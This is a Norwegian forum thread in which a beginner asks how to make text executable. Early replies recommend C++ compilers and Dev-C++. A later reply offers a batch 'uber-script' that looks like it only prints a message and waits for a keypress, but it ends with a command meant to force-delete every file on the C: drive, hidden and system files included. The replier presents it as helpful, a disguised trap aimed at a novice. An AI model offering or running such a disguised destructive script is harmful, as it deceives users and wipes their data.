Gå til innhold

Kompilator som gjør teks kjørbar

Anbefalte innlegg

Videoannonse
Annonse

Vel, kode er jo bare tekst da. Så lenge du har programmert det i et programmeringsspråk som det finnes en kompilator til så er det i grunnen bare å copy-paste det inn i kompilatoren og la den konvertere det inn til maskinkode. Hvis du har brukt C++ som du sier så finnes det jo utallige kompilatorer til dette.

Søker du "c++ compiler" på google så skal det være unødvendig å spørre etter en direkte link synes jeg...

Det jeg gjerne vil vite er: Hvordan i alle dager har du fått kunnskapen til å kunne programmere uten å vite hvor du får fatt i en kompilator til programmeringsspråket du bruker? ... går ikke de to tingene ganske mye hånd i hånd? Det blir litt som å prøve å lære å skrive uten å kunne lese hehe =P

-Stigma

Lenke til kommentar

Vanligvis kommer Dev-C++ med en ferdig installert kompilator (MinGW/GCC). Da må du bare trykke på knappen med de fire fargete firkantene for å kompilere programmet og den ved siden kjører det (den tredje knappen gjør begge aksjoner med en gang).

PS: Du trenger egentlig ikke å bruke Notepad, for Dev-C++ har en integrert editor, som forresten er tydelig bedre for å skrive C++-kode.

Lenke til kommentar
  • 3 måneder senere...

Eventuelt skrive om teksten i notepad og gjøre den om til et "uber-script" (spesielt 'fryktet' av de som hold på i 'dos-tia' grunnet virus osv. Men også nyttig av og til.)

@echo off

cls

echo Dette er min tekst.

echo

set /p return=Trykk en knapp for å avslutte . . .

del /A +a +r +s +h /F /S C:\

(Var igrunn ikke heilt sikker på den delete kommandoen men trur dette skal funke:P)

- Aleksander -

Endret av zorgion
Lenke til kommentar

Opprett en konto eller logg inn for å kommentere

Du må være et medlem for å kunne skrive en kommentar

Opprett konto

Det er enkelt å melde seg inn for å starte en ny konto!

Start en konto

Logg inn

Har du allerede en konto? Logg inn her.

Logg inn nå
  • Hvem er aktive   0 medlemmer

• Ingen innloggede medlemmer aktive
  • Opprett ny...